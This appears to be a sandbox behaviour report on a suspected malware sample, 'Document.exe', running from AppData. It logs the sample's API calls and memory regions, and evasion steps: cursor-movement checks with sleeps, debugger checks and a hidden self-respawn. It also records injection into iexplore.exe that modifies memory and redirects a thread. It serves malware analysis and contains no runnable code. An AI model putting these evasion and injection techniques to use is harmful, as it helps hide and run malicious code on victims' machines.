Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0, value_name = AllowUnsafeObjectPassing, data = 68, type = REG_NONE	1	Fn
File	Get Info	filename = C:\Windows\system32\.HLP, type = file_attributes	2	Fn
System	Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
File	Get Info	filename = C:\Windows\Help\.HLP, type = file_attributes	2	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn

Process #9: document.exe

147

0

»

Information	Value
ID	#9
File Name	c:\users\aetadzjz\appdata\roaming\document\document.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe" 2 2616 18220554
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:12, Reason: Child Process
Unmonitor	End Time: 00:03:34, Reason: Self Terminated
Monitor Duration	00:00:22

OS Process Information

»

Information	Value
PID	0xa68
Parent PID	0x81c (c:\users\aetadzjz\appdata\roaming\document\document.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 6C8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	rwx	-
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
private_0x0000000000240000	0x00240000	0x00240fff	Private Memory	rw	-
private_0x0000000000250000	0x00250000	0x002cffff	Private Memory	rw	-
private_0x00000000002d0000	0x002d0000	0x0031ffff	Private Memory	rw	-
private_0x00000000002d0000	0x002d0000	0x002d0fff	Private Memory	rwx	-
private_0x00000000002e0000	0x002e0000	0x0031ffff	Private Memory	rw	-
private_0x0000000000320000	0x00320000	0x00330fff	Private Memory	rw	-
private_0x0000000000340000	0x00340000	0x0034ffff	Private Memory	rw	-
pagefile_0x0000000000340000	0x00340000	0x00347fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000350000	0x00350000	0x00357fff	Pagefile Backed Memory	rw	-
private_0x00000000003c0000	0x003c0000	0x003cffff	Private Memory	rw	-
document.exe	0x00400000	0x004b2fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x0000000000570000	0x00570000	0x0066ffff	Private Memory	rw	-
pagefile_0x0000000000670000	0x00670000	0x007f7fff	Pagefile Backed Memory	r	-
private_0x0000000000800000	0x00800000	0x0080ffff	Private Memory	rw	-
pagefile_0x0000000000810000	0x00810000	0x00990fff	Pagefile Backed Memory	r	-
pagefile_0x00000000009a0000	0x009a0000	0x01d9ffff	Pagefile Backed Memory	r	-
private_0x0000000001da0000	0x01da0000	0x01e9ffff	Private Memory	-	-
pagefile_0x0000000001ea0000	0x01ea0000	0x01f7efff	Pagefile Backed Memory	r	-
private_0x0000000001f80000	0x01f80000	0x020effff	Private Memory	rw	-
staticcache.dat	0x020f0000	0x02a1ffff	Memory Mapped File	r	-
pagefile_0x0000000002a20000	0x02a20000	0x02e12fff	Pagefile Backed Memory	r	-
private_0x0000000002e20000	0x02e20000	0x2474ffff	Private Memory	-	-
private_0x0000000002e20000	0x02e20000	0x0ae20fff	Private Memory	rw	-
version.dll	0x74ba0000	0x74ba8fff	Memory Mapped File	rwx	-
dwmapi.dll	0x751f0000	0x75202fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
comctl32.dll	0x75460000	0x754e3fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
shell32.dll	0x76b00000	0x77749fff	Memory Mapped File	rwx	-
comdlg32.dll	0x77780000	0x777fafff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Threads

Thread 0x6c8

147

0

»

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	1	Fn
Keyboard	Get Info	type = 0, result_out = 4	1	Fn
System	Get Info	type = Operating System	2	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.ENU, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, base_address = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceExA, address_out = 0x762b434f	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VariantChangeTypeEx, address_out = 0x76724c28	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7679c802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7679ec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76745934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7679d332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7679dbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7679e405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7679f00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7679f15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76745a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7679ecfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7679ee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7673b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarI4FromStr, address_out = 0x76736fab	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromStr, address_out = 0x767401a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR8FromStr, address_out = 0x7673699e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromStr, address_out = 0x76746ba7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyFromStr, address_out = 0x76766c12	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBoolFromStr, address_out = 0x7673dbd1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromCy, address_out = 0x76747fdc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromDate, address_out = 0x76737a2a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromBool, address_out = 0x76740355	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x77844413	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x77837d2f	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7784451a	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 256	1	Fn
Window	Create	window_name = Document, class_name = TApplication, wndproc_parameter = 0	1	Fn
Window	Set Attribute	window_name = Document, class_name = TApplication, index = 18446744073709551612, new_long = 2166767	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = AnimateWindow, address_out = 0x7784b531	1	Fn
Module	Get Handle	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75460000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitializeFlatSB, address_out = 0x7549266f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = UninitializeFlatSB, address_out = 0x75492542	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollProp, address_out = 0x75491d29	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollProp, address_out = 0x7549238d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_EnableScrollBar, address_out = 0x754920c9	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_ShowScrollBar, address_out = 0x75491fdb	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollRange, address_out = 0x75491e8d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollInfo, address_out = 0x75491f0f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollPos, address_out = 0x75491ccd	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollPos, address_out = 0x7549216d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollInfo, address_out = 0x754922be	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollRange, address_out = 0x754921e2	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetLayeredWindowAttributes, address_out = 0x7785ec88	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 255	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	2	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 452, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 497	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
Module	Load	module_name = shell32, base_address = 0x76b00000	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\document\document.exe	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\document\document.exe	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	1	Fn
Process	Create	process_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, os_pid = 0xb6c, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, show_window = SW_HIDE	1	Fn

Process #10: iexplore.exe

0

»

Information	Value
ID	#10
File Name	c:\program files (x86)\internet explorer\iexplore.exe
Command Line	C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:15, Reason: Child Process
Unmonitor	End Time: 00:03:18, Reason: Crashed
Monitor Duration	00:00:03
Remark	No high level activity detected in monitored regions

OS Process Information

»

Information	Value
PID	0xabc
Parent PID	0xa38 (c:\users\aetadzjz\appdata\roaming\document\document.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AD8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	r	-
iexplore.exe	0x00290000	0x00335fff	Memory Mapped File	rwx	-
private_0x0000000000350000	0x00350000	0x0044ffff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006bffff	Private Memory	rw	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x400000, size = 4096	1	Fn
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x401000, size = 249856	1	Fn
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x43e000, size = 0	1	Fn Data
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x442000, size = 4096	1	Fn Data
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x7efde008, size = 4	1	Fn Data
Modify Control Flow	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	os_tid = 0xad8, address = 0x77e301c4	1	Fn

Process #11: iexplore.exe

463

10

»

Information	Value
ID	#11
File Name	c:\program files (x86)\internet explorer\iexplore.exe
Command Line	C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:19, Reason: Child Process
Unmonitor	End Time: 00:03:48, Reason: Self Terminated
Monitor Duration	00:00:29

OS Process Information

»

Information	Value
PID	0x35c
Parent PID	0xa38 (c:\users\aetadzjz\appdata\roaming\document\document.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x F0 0x 7E0 0x 144

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x0003ffff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	rw	-
private_0x0000000000070000	0x00070000	0x000affff	Private Memory	rw	-
locale.nls	0x000b0000	0x00116fff	Memory Mapped File	r	-
private_0x0000000000120000	0x00120000	0x0015ffff	Private Memory	rw	-
private_0x0000000000120000	0x00120000	0x0012ffff	Private Memory	rw	-
pagefile_0x0000000000130000	0x00130000	0x00130fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	r	-
private_0x0000000000150000	0x00150000	0x0015ffff	Private Memory	rw	-
private_0x0000000000160000	0x00160000	0x0019ffff	Private Memory	rw	-
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	r	-
private_0x00000000001b0000	0x001b0000	0x001effff	Private Memory	rw	-
private_0x00000000001b0000	0x001b0000	0x001bbfff	Private Memory	rw	-
scrrun.dll	0x001b0000	0x001c4fff	Memory Mapped File	r	-
private_0x00000000001e0000	0x001e0000	0x001effff	Private Memory	rw	-
msvbvm60.dll	0x001f0000	0x00209fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	rw	-
private_0x0000000000310000	0x00310000	0x003fffff	Private Memory	rw	-
private_0x0000000000310000	0x00310000	0x0038ffff	Private Memory	rw	-
private_0x00000000003c0000	0x003c0000	0x003fffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00442fff	Private Memory	rwx	-
pagefile_0x0000000000450000	0x00450000	0x0052efff	Pagefile Backed Memory	r	-
private_0x0000000000540000	0x00540000	0x005bffff	Private Memory	rw	-
private_0x00000000006b0000	0x006b0000	0x007affff	Private Memory	rw	-
pagefile_0x00000000007b0000	0x007b0000	0x00937fff	Pagefile Backed Memory	r	-
private_0x0000000000940000	0x00940000	0x00a6ffff	Private Memory	rw	-
private_0x00000000009a0000	0x009a0000	0x009dffff	Private Memory	rw	-
private_0x0000000000a60000	0x00a60000	0x00a6ffff	Private Memory	rw	-
iexplore.exe	0x00ac0000	0x00b65fff	Memory Mapped File	rwx	-
pagefile_0x0000000000b70000	0x00b70000	0x00cf0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000d00000	0x00d00000	0x020fffff	Pagefile Backed Memory	r	-
private_0x0000000002100000	0x02100000	0x024fffff	Private Memory	rw	-
sortdefault.nls	0x02500000	0x027cefff	Memory Mapped File	r	-
private_0x00000000027d0000	0x027d0000	0x0299ffff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x0295ffff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028dffff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x0295ffff	Private Memory	rw	-
private_0x0000000002960000	0x02960000	0x0299ffff	Private Memory	rw	-
private_0x00000000029a0000	0x029a0000	0x02adffff	Private Memory	rw	-
private_0x0000000002b30000	0x02b30000	0x02c2ffff	Private Memory	rw	-
private_0x0000000002c30000	0x02c30000	0x02d6ffff	Private Memory	rw	-
